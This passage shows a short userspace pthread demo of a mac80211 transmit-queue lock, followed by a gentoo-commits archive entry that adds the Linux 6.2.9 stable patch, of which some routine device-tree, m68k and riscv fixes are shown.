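	pthread_mutex_lock(&handle_wake_tx_queue_lock);   /* the added spin_lock() */
	schedule_rounds++;	/* ieee80211_txq_schedule_start() */
	/* ... the next_txq()/drv_tx() loop would run here ... */
	pthread_mutex_unlock(&handle_wake_tx_queue_lock); /* the added spin_unlock() */
}

static void *worker(void *arg)
{
	(void)arg;
	for (int i = 0; i < 100000; i++)
		handle_wake_tx_queue();
	return NULL;
}

int main(void)
{
	pthread_t t1, t2;

	pthread_create(&t1, NULL, worker, NULL);
	pthread_create(&t2, NULL, worker, NULL);
	pthread_join(t1, NULL);
	pthread_join(t2, NULL);
	printf("rounds: %ld\n", schedule_rounds);	/* 200000: no lost updates */
	return 0;
}

Built with `cc -pthread`, the count is always 200000; drop the lock and lost updates appear — the userspace analogue of the overlapping drv_tx() calls the commit message warns about.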


* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-30 11:20 Alice Ferrazzi
  0 siblings, 0 replies; 30+ messages in thread
From: Alice Ferrazzi @ 2023-03-30 11:20 UTC (permalink / raw
  To: gentoo-commits

commit:     10a5a9c990c89c266dfc68235dc61d9c5f8bb667
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Thu Mar 30 11:20:25 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Thu Mar 30 11:20:25 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=10a5a9c9

Linux patch 6.2.9

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README            |    4 +
 1008_linux-6.2.9.patch | 8993 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 8997 insertions(+)

diff --git a/0000_README b/0000_README
index a2d57d44..737b0e84 100644
--- a/0000_README
+++ b/0000_README
@@ -75,6 +75,10 @@ Patch:  1007_linux-6.2.8.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.8
 
+Patch:  1008_linux-6.2.9.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.9
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1008_linux-6.2.9.patch b/1008_linux-6.2.9.patch
new file mode 100644
index 00000000..275257fa
--- /dev/null
+++ b/1008_linux-6.2.9.patch
@@ -0,0 +1,8993 @@
+diff --git a/Makefile b/Makefile
+index 2c90d9b067f4a..8732f7208d59b 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 8
++SUBLEVEL = 9
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/e60k02.dtsi b/arch/arm/boot/dts/e60k02.dtsi
+index 94944cc219317..dd03e3860f97f 100644
+--- a/arch/arm/boot/dts/e60k02.dtsi
++++ b/arch/arm/boot/dts/e60k02.dtsi
+@@ -311,6 +311,7 @@
+ 
+ &usbotg1 {
+ 	pinctrl-names = "default";
++	pinctrl-0 = <&pinctrl_usbotg1>;
+ 	disable-over-current;
+ 	srp-disable;
+ 	hnp-disable;
+diff --git a/arch/arm/boot/dts/e70k02.dtsi b/arch/arm/boot/dts/e70k02.dtsi
+index 27ef9a62b23cf..a1f9fbd6004aa 100644
+--- a/arch/arm/boot/dts/e70k02.dtsi
++++ b/arch/arm/boot/dts/e70k02.dtsi
+@@ -312,6 +312,7 @@
+ 
+ &usbotg1 {
+ 	pinctrl-names = "default";
++	pinctrl-0 = <&pinctrl_usbotg1>;
+ 	disable-over-current;
+ 	srp-disable;
+ 	hnp-disable;
+diff --git a/arch/arm/boot/dts/imx6sl-tolino-shine2hd.dts b/arch/arm/boot/dts/imx6sl-tolino-shine2hd.dts
+index da1399057634a..815119c12bd48 100644
+--- a/arch/arm/boot/dts/imx6sl-tolino-shine2hd.dts
++++ b/arch/arm/boot/dts/imx6sl-tolino-shine2hd.dts
+@@ -625,6 +625,7 @@
+ 
+ &usbotg1 {
+ 	pinctrl-names = "default";
++	pinctrl-0 = <&pinctrl_usbotg1>;
+ 	disable-over-current;
+ 	srp-disable;
+ 	hnp-disable;
+diff --git a/arch/arm64/boot/dts/freescale/imx8-ss-lsio.dtsi b/arch/arm64/boot/dts/freescale/imx8-ss-lsio.dtsi
+index 1f3d225e64ece..06b94bbc2b97d 100644
+--- a/arch/arm64/boot/dts/freescale/imx8-ss-lsio.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8-ss-lsio.dtsi
+@@ -117,7 +117,7 @@ lsio_subsys: bus@5d000000 {
+ 		interrupts = <GIC_SPI 92 IRQ_TYPE_LEVEL_HIGH>;
+ 		clocks = <&clk IMX_SC_R_FSPI_0 IMX_SC_PM_CLK_PER>,
+ 			 <&clk IMX_SC_R_FSPI_0 IMX_SC_PM_CLK_PER>;
+-		clock-names = "fspi", "fspi_en";
++		clock-names = "fspi_en", "fspi";
+ 		power-domains = <&pd IMX_SC_R_FSPI_0>;
+ 		status = "disabled";
+ 	};
+diff --git a/arch/arm64/boot/dts/freescale/imx8dxl-evk.dts b/arch/arm64/boot/dts/freescale/imx8dxl-evk.dts
+index 280a9c9d8bd98..852420349c013 100644
+--- a/arch/arm64/boot/dts/freescale/imx8dxl-evk.dts
++++ b/arch/arm64/boot/dts/freescale/imx8dxl-evk.dts
+@@ -121,8 +121,6 @@
+ 	phy-handle = <&ethphy0>;
+ 	nvmem-cells = <&fec_mac1>;
+ 	nvmem-cell-names = "mac-address";
+-	snps,reset-gpios = <&pca6416_1 2 GPIO_ACTIVE_LOW>;
+-	snps,reset-delays-us = <10 20 200000>;
+ 	status = "okay";
+ 
+ 	mdio {
+@@ -135,6 +133,10 @@
+ 			reg = <0>;
+ 			eee-broken-1000t;
+ 			qca,disable-smarteee;
++			qca,disable-hibernation-mode;
++			reset-gpios = <&pca6416_1 2 GPIO_ACTIVE_LOW>;
++			reset-assert-us = <20>;
++			reset-deassert-us = <200000>;
+ 			vddio-supply = <&vddio0>;
+ 
+ 			vddio0: vddio-regulator {
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts b/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
+index 6357078185edd..0e8f0d7161ad0 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
+@@ -247,7 +247,7 @@
+ 		compatible = "wlf,wm8960";
+ 		reg = <0x1a>;
+ 		clocks = <&clk IMX8MM_CLK_SAI1_ROOT>;
+-		clock-names = "mclk1";
++		clock-names = "mclk";
+ 		wlf,shared-lrclk;
+ 		#sound-dai-cells = <0>;
+ 	};
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn.dtsi b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+index 7601a031f85a0..b3120b49bd712 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+@@ -296,6 +296,7 @@
+ 				sai2: sai@30020000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x30020000 0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 96 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI2_IPG>,
+ 						<&clk IMX8MN_CLK_DUMMY>,
+@@ -310,6 +311,7 @@
+ 				sai3: sai@30030000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x30030000 0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 50 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI3_IPG>,
+ 						 <&clk IMX8MN_CLK_DUMMY>,
+@@ -324,6 +326,7 @@
+ 				sai5: sai@30050000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x30050000 0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 90 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI5_IPG>,
+ 						 <&clk IMX8MN_CLK_DUMMY>,
+@@ -340,6 +343,7 @@
+ 				sai6: sai@30060000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x30060000  0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 90 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI6_IPG>,
+ 						 <&clk IMX8MN_CLK_DUMMY>,
+@@ -397,6 +401,7 @@
+ 				sai7: sai@300b0000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x300b0000 0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 111 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI7_IPG>,
+ 						 <&clk IMX8MN_CLK_DUMMY>,
+diff --git a/arch/arm64/boot/dts/freescale/imx93.dtsi b/arch/arm64/boot/dts/freescale/imx93.dtsi
+index 5d79663b3b84c..d1b34d9db9daf 100644
+--- a/arch/arm64/boot/dts/freescale/imx93.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx93.dtsi
+@@ -164,6 +164,8 @@
+ 			lpi2c1: i2c@44340000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x44340000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 13 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C1_GATE>,
+ 					 <&clk IMX93_CLK_BUS_AON>;
+@@ -174,6 +176,8 @@
+ 			lpi2c2: i2c@44350000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x44350000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 14 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C2_GATE>,
+ 					 <&clk IMX93_CLK_BUS_AON>;
+@@ -316,6 +320,8 @@
+ 			lpi2c3: i2c@42530000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x42530000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 62 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C3_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -326,6 +332,8 @@
+ 			lpi2c4: i2c@42540000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x42540000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 63 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C4_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -414,6 +422,8 @@
+ 			lpi2c5: i2c@426b0000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x426b0000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 195 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C5_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -424,6 +434,8 @@
+ 			lpi2c6: i2c@426c0000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x426c0000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 196 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C6_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -434,6 +446,8 @@
+ 			lpi2c7: i2c@426d0000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x426d0000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 197 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C7_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -444,6 +458,8 @@
+ 			lpi2c8: i2c@426e0000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x426e0000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 198 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C8_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index 3bedd45e14afd..a407cd2579719 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -2122,6 +2122,8 @@
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pcie1_clkreq_n>;
+ 
++			dma-coherent;
++
+ 			iommus = <&apps_smmu 0x1c80 0x1>;
+ 
+ 			iommu-map = <0x0 &apps_smmu 0x1c80 0x1>,
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp-lenovo-thinkpad-x13s.dts b/arch/arm64/boot/dts/qcom/sc8280xp-lenovo-thinkpad-x13s.dts
+index 568c6be1ceaae..d21bb7f3ec259 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp-lenovo-thinkpad-x13s.dts
++++ b/arch/arm64/boot/dts/qcom/sc8280xp-lenovo-thinkpad-x13s.dts
+@@ -186,6 +186,7 @@
+ 			regulator-min-microvolt = <1272000>;
+ 			regulator-max-microvolt = <1272000>;
+ 			regulator-initial-mode = <RPMH_REGULATOR_MODE_HPM>;
++			regulator-always-on;
+ 		};
+ 
+ 		vreg_l3b: ldo3 {
+@@ -425,75 +426,88 @@
+ 	pmic-die-temp@3 {
+ 		reg = <PMK8350_ADC7_DIE_TEMP>;
+ 		qcom,pre-scaling = <1 1>;
++		label = "pmk8350_die_temp";
+ 	};
+ 
+ 	xo-therm@44 {
+ 		reg = <PMK8350_ADC7_AMUX_THM1_100K_PU>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "pmk8350_xo_therm";
+ 	};
+ 
+ 	pmic-die-temp@103 {
+ 		reg = <PM8350_ADC7_DIE_TEMP(1)>;
+ 		qcom,pre-scaling = <1 1>;
++		label = "pmc8280_1_die_temp";
+ 	};
+ 
+ 	sys-therm@144 {
+ 		reg = <PM8350_ADC7_AMUX_THM1_100K_PU(1)>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "sys_therm1";
+ 	};
+ 
+ 	sys-therm@145 {
+ 		reg = <PM8350_ADC7_AMUX_THM2_100K_PU(1)>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "sys_therm2";
+ 	};
+ 
+ 	sys-therm@146 {
+ 		reg = <PM8350_ADC7_AMUX_THM3_100K_PU(1)>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "sys_therm3";
+ 	};
+ 
+ 	sys-therm@147 {
+ 		reg = <PM8350_ADC7_AMUX_THM4_100K_PU(1)>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "sys_therm4";
+ 	};
+ 
+ 	pmic-die-temp@303 {
+ 		reg = <PM8350_ADC7_DIE_TEMP(3)>;
+ 		qcom,pre-scaling = <1 1>;
++		label = "pmc8280_2_die_temp";
+ 	};
+ 
+ 	sys-therm@344 {
+ 		reg = <PM8350_ADC7_AMUX_THM1_100K_PU(3)>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "sys_therm5";
+ 	};
+ 
+ 	sys-therm@345 {
+ 		reg = <PM8350_ADC7_AMUX_THM2_100K_PU(3)>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "sys_therm6";
+ 	};
+ 
+ 	sys-therm@346 {
+ 		reg = <PM8350_ADC7_AMUX_THM3_100K_PU(3)>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "sys_therm7";
+ 	};
+ 
+ 	sys-therm@347 {
+ 		reg = <PM8350_ADC7_AMUX_THM4_100K_PU(3)>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "sys_therm8";
+ 	};
+ 
+ 	pmic-die-temp@403 {
+ 		reg = <PMR735A_ADC7_DIE_TEMP>;
+ 		qcom,pre-scaling = <1 1>;
++		label = "pmr735a_die_temp";
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm6375.dtsi b/arch/arm64/boot/dts/qcom/sm6375.dtsi
+index 12cf5dbe5bd64..419df4e3ac91d 100644
+--- a/arch/arm64/boot/dts/qcom/sm6375.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6375.dtsi
+@@ -1209,6 +1209,7 @@
+ 			clock-names = "xo";
+ 
+ 			power-domains = <&rpmpd SM6375_VDDCX>;
++			power-domain-names = "cx";
+ 
+ 			memory-region = <&pil_cdsp_mem>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index a0c57fb798d3b..f790223ed8f5a 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -1810,7 +1810,7 @@
+ 				      "slave_q2a",
+ 				      "tbu";
+ 
+-			iommus = <&apps_smmu 0x1d80 0x7f>;
++			iommus = <&apps_smmu 0x1d80 0x3f>;
+ 			iommu-map = <0x0   &apps_smmu 0x1d80 0x1>,
+ 				    <0x100 &apps_smmu 0x1d81 0x1>;
+ 
+@@ -1909,7 +1909,7 @@
+ 			assigned-clocks = <&gcc GCC_PCIE_1_AUX_CLK>;
+ 			assigned-clock-rates = <19200000>;
+ 
+-			iommus = <&apps_smmu 0x1e00 0x7f>;
++			iommus = <&apps_smmu 0x1e00 0x3f>;
+ 			iommu-map = <0x0   &apps_smmu 0x1e00 0x1>,
+ 				    <0x100 &apps_smmu 0x1e01 0x1>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8450.dtsi b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+index f57980a32b433..16a73288c1b37 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+@@ -2104,8 +2104,8 @@
+ 				 <&q6prmcc LPASS_HW_DCODEC_VOTE LPASS_CLK_ATTRIBUTE_COUPLE_NO>,
+ 				 <&vamacro>;
+ 			clock-names = "mclk", "npl", "macro", "dcodec", "fsgen";
+-			assigned-clocks = <&q6prmcc LPASS_CLK_ID_WSA_CORE_TX_MCLK LPASS_CLK_ATTRIBUTE_COUPLE_NO>,
+-					  <&q6prmcc LPASS_CLK_ID_WSA_CORE_TX_2X_MCLK LPASS_CLK_ATTRIBUTE_COUPLE_NO>;
++			assigned-clocks = <&q6prmcc LPASS_CLK_ID_WSA2_CORE_TX_MCLK LPASS_CLK_ATTRIBUTE_COUPLE_NO>,
++					  <&q6prmcc LPASS_CLK_ID_WSA2_CORE_TX_2X_MCLK LPASS_CLK_ATTRIBUTE_COUPLE_NO>;
+ 			assigned-clock-rates = <19200000>, <19200000>;
+ 
+ 			#clock-cells = <0>;
+@@ -3658,6 +3658,7 @@
+ 			power-domains = <&gcc UFS_PHY_GDSC>;
+ 
+ 			iommus = <&apps_smmu 0xe0 0x0>;
++			dma-coherent;
+ 
+ 			interconnects = <&aggre1_noc MASTER_UFS_MEM 0 &mc_virt SLAVE_EBI1 0>,
+ 					<&gem_noc MASTER_APPSS_PROC 0 &config_noc SLAVE_UFS_MEM_CFG 0>;
+diff --git a/arch/arm64/kernel/efi-header.S b/arch/arm64/kernel/efi-header.S
+index 28d8a5dca5f12..d731b4655df8e 100644
+--- a/arch/arm64/kernel/efi-header.S
++++ b/arch/arm64/kernel/efi-header.S
+@@ -66,7 +66,7 @@
+ 	.long	.Lefi_header_end - .L_head		// SizeOfHeaders
+ 	.long	0					// CheckSum
+ 	.short	IMAGE_SUBSYSTEM_EFI_APPLICATION		// Subsystem
+-	.short	0					// DllCharacteristics
++	.short	IMAGE_DLL_CHARACTERISTICS_NX_COMPAT	// DllCharacteristics
+ 	.quad	0					// SizeOfStackReserve
+ 	.quad	0					// SizeOfStackCommit
+ 	.quad	0					// SizeOfHeapReserve
+diff --git a/arch/m68k/kernel/traps.c b/arch/m68k/kernel/traps.c
+index 5c8cba0efc63e..a700807c9b6d9 100644
+--- a/arch/m68k/kernel/traps.c
++++ b/arch/m68k/kernel/traps.c
+@@ -30,6 +30,7 @@
+ #include <linux/init.h>
+ #include <linux/ptrace.h>
+ #include <linux/kallsyms.h>
++#include <linux/extable.h>
+ 
+ #include <asm/setup.h>
+ #include <asm/fpu.h>
+@@ -545,7 +546,8 @@ static inline void bus_error030 (struct frame *fp)
+ 			errorcode |= 2;
+ 
+ 		if (mmusr & (MMU_I | MMU_WP)) {
+-			if (ssw & 4) {
++			/* We might have an exception table for this PC */
++			if (ssw & 4 && !search_exception_tables(fp->ptregs.pc)) {
+ 				pr_err("Data %s fault at %#010lx in %s (pc=%#lx)\n",
+ 				       ssw & RW ? "read" : "write",
+ 				       fp->un.fmtb.daddr,
+diff --git a/arch/m68k/mm/motorola.c b/arch/m68k/mm/motorola.c
+index 2a375637e0077..9113012240789 100644
+--- a/arch/m68k/mm/motorola.c
++++ b/arch/m68k/mm/motorola.c
+@@ -437,7 +437,7 @@ void __init paging_init(void)
+ 	}
+ 
+ 	min_addr = m68k_memory[0].addr;
+-	max_addr = min_addr + m68k_memory[0].size;
++	max_addr = min_addr + m68k_memory[0].size - 1;
+ 	memblock_add_node(m68k_memory[0].addr, m68k_memory[0].size, 0,
+ 			  MEMBLOCK_NONE);
+ 	for (i = 1; i < m68k_num_memory;) {
+@@ -452,21 +452,21 @@ void __init paging_init(void)
+ 		}
+ 		memblock_add_node(m68k_memory[i].addr, m68k_memory[i].size, i,
+ 				  MEMBLOCK_NONE);
+-		addr = m68k_memory[i].addr + m68k_memory[i].size;
++		addr = m68k_memory[i].addr + m68k_memory[i].size - 1;
+ 		if (addr > max_addr)
+ 			max_addr = addr;
+ 		i++;
+ 	}
+ 	m68k_memoffset = min_addr - PAGE_OFFSET;
+-	m68k_virt_to_node_shift = fls(max_addr - min_addr - 1) - 6;
++	m68k_virt_to_node_shift = fls(max_addr - min_addr) - 6;
+ 
+ 	module_fixup(NULL, __start_fixup, __stop_fixup);
+ 	flush_icache();
+ 
+-	high_memory = phys_to_virt(max_addr);
++	high_memory = phys_to_virt(max_addr) + 1;
+ 
+ 	min_low_pfn = availmem >> PAGE_SHIFT;
+-	max_pfn = max_low_pfn = max_addr >> PAGE_SHIFT;
++	max_pfn = max_low_pfn = (max_addr >> PAGE_SHIFT) + 1;
+ 
+ 	/* Reserve kernel text/data/bss and the memory allocated in head.S */
+ 	memblock_reserve(m68k_memory[0].addr, availmem - m68k_memory[0].addr);
+diff --git a/arch/powerpc/xmon/xmon.c b/arch/powerpc/xmon/xmon.c
+index 0da66bc4823d4..3b4e2475fc4ef 100644
+--- a/arch/powerpc/xmon/xmon.c
++++ b/arch/powerpc/xmon/xmon.c
+@@ -1277,7 +1277,7 @@ static int xmon_batch_next_cpu(void)
+ 	while (!cpumask_empty(&xmon_batch_cpus)) {
+ 		cpu = cpumask_next_wrap(smp_processor_id(), &xmon_batch_cpus,
+ 					xmon_batch_start_cpu, true);
+-		if (cpu == nr_cpumask_bits)
++		if (cpu >= nr_cpu_ids)
+ 			break;
+ 		if (xmon_batch_start_cpu == -1)
+ 			xmon_batch_start_cpu = cpu;
+diff --git a/arch/riscv/Kconfig b/arch/riscv/Kconfig
+index ee0d39b267946..08a0f0c2c4857 100644
+--- a/arch/riscv/Kconfig
++++ b/arch/riscv/Kconfig
+@@ -447,6 +447,28 @@ config TOOLCHAIN_HAS_ZIHINTPAUSE
+ 	depends on !32BIT || $(cc-option,-mabi=ilp32 -march=rv32ima_zihintpause)
+ 	depends on LLD_VERSION >= 150000 || LD_VERSION >= 23600
+ 
++config TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI
++	def_bool y
++	# https://sourceware.org/git/?p=binutils-gdb.git;a=commit;h=aed44286efa8ae8717a77d94b51ac3614e2ca6dc
++	depends on AS_IS_GNU && AS_VERSION >= 23800
++	help
++	  Newer binutils versions default to ISA spec version 20191213 which
++	  moves some instructions from the I extension to the Zicsr and Zifencei
++	  extensions.
++
++config TOOLCHAIN_NEEDS_OLD_ISA_SPEC
++	def_bool y
++	depends on TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI
++	# https://github.com/llvm/llvm-project/commit/22e199e6afb1263c943c0c0d4498694e15bf8a16
++	depends on CC_IS_CLANG && CLANG_VERSION < 170000
++	help
++	  Certain versions of clang do not support zicsr and zifencei via -march
++	  but newer versions of binutils require it for the reasons noted in the
++	  help text of CONFIG_TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI. This
++	  option causes an older ISA spec compatible with these older versions
++	  of clang to be passed to GAS, which has the same result as passing zicsr
++	  and zifencei to -march.
++
+ config FPU
+ 	bool "FPU support"
+ 	default y
+diff --git a/arch/riscv/Makefile b/arch/riscv/Makefile
+index 5931a0ff3c814..0d196e0120f2c 100644
+--- a/arch/riscv/Makefile
++++ b/arch/riscv/Makefile
+@@ -57,10 +57,12 @@ riscv-march-$(CONFIG_ARCH_RV64I)	:= rv64ima
+ riscv-march-$(CONFIG_FPU)		:= $(riscv-march-y)fd
+ riscv-march-$(CONFIG_RISCV_ISA_C)	:= $(riscv-march-y)c
+ 
+-# Newer binutils versions default to ISA spec version 20191213 which moves some
+-# instructions from the I extension to the Zicsr and Zifencei extensions.
+-toolchain-need-zicsr-zifencei := $(call cc-option-yn, -march=$(riscv-march-y)_zicsr_zifencei)
+-riscv-march-$(toolchain-need-zicsr-zifencei) := $(riscv-march-y)_zicsr_zifencei
++ifdef CONFIG_TOOLCHAIN_NEEDS_OLD_ISA_SPEC
++KBUILD_CFLAGS += -Wa,-misa-spec=2.2
++KBUILD_AFLAGS += -Wa,-misa-spec=2.2
++else
++riscv-march-$(CONFIG_TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI) := $(riscv-march-y)_zicsr_zifencei
++endif
+ 
+ # Check if the toolchain supports Zicbom extension
+ riscv-march-$(CONFIG_TOOLCHAIN_HAS_ZICBOM) := $(riscv-march-y)_zicbom
+diff --git a/arch/riscv/include/asm/tlbflush.h b/arch/riscv/include/asm/tlbflush.h
+index 801019381dea3..a09196f8de688 100644
+--- a/arch/riscv/include/asm/tlbflush.h
++++ b/arch/riscv/include/asm/tlbflush.h
+@@ -12,6 +12,8 @@
+ #include <asm/errata_list.h>
+ 
+ #ifdef CONFIG_MMU
++extern unsigned long asid_mask;
++
+ static inline void local_flush_tlb_all(void)
+ {
+ 	__asm__ __volatile__ ("sfence.vma" : : : "memory");
+diff --git a/arch/riscv/include/uapi/asm/setup.h b/arch/riscv/include/uapi/asm/setup.h
+new file mode 100644
+index 0000000000000..66b13a5228808
+--- /dev/null
++++ b/arch/riscv/include/uapi/asm/setup.h
+@@ -0,0 +1,8 @@
++/* SPDX-License-Identifier: GPL-2.0-only WITH Linux-syscall-note */
++
++#ifndef _UAPI_ASM_RISCV_SETUP_H
++#define _UAPI_ASM_RISCV_SETUP_H
++
++#define COMMAND_LINE_SIZE	1024
++
++#endif /* _UAPI_ASM_RISCV_SETUP_H */
+diff --git a/arch/riscv/mm/context.c b/arch/riscv/mm/context.c
+index 0f784e3d307bb..12e22e7330e7b 100644
+--- a/arch/riscv/mm/context.c
++++ b/arch/riscv/mm/context.c
+@@ -22,7 +22,7 @@ DEFINE_STATIC_KEY_FALSE(use_asid_allocator);
+ 
+ static unsigned long asid_bits;
+ static unsigned long num_asids;
+-static unsigned long asid_mask;
++unsigned long asid_mask;
+ 
+ static atomic_long_t current_version;
+ 
+diff --git a/arch/riscv/mm/tlbflush.c b/arch/riscv/mm/tlbflush.c
+index 37ed760d007c3..ef701fa83f368 100644
+--- a/arch/riscv/mm/tlbflush.c
++++ b/arch/riscv/mm/tlbflush.c
+@@ -42,7 +42,7 @@ static void __sbi_tlb_flush_range(struct mm_struct *mm, unsigned long start,
+ 	/* check if the tlbflush needs to be sent to other CPUs */
+ 	broadcast = cpumask_any_but(cmask, cpuid) < nr_cpu_ids;
+ 	if (static_branch_unlikely(&use_asid_allocator)) {
+-		unsigned long asid = atomic_long_read(&mm->context.id);
++		unsigned long asid = atomic_long_read(&mm->context.id) & asid_mask;
+ 
+ 		if (broadcast) {
+ 			sbi_remote_sfence_vma_asid(cmask, start, size, asid);
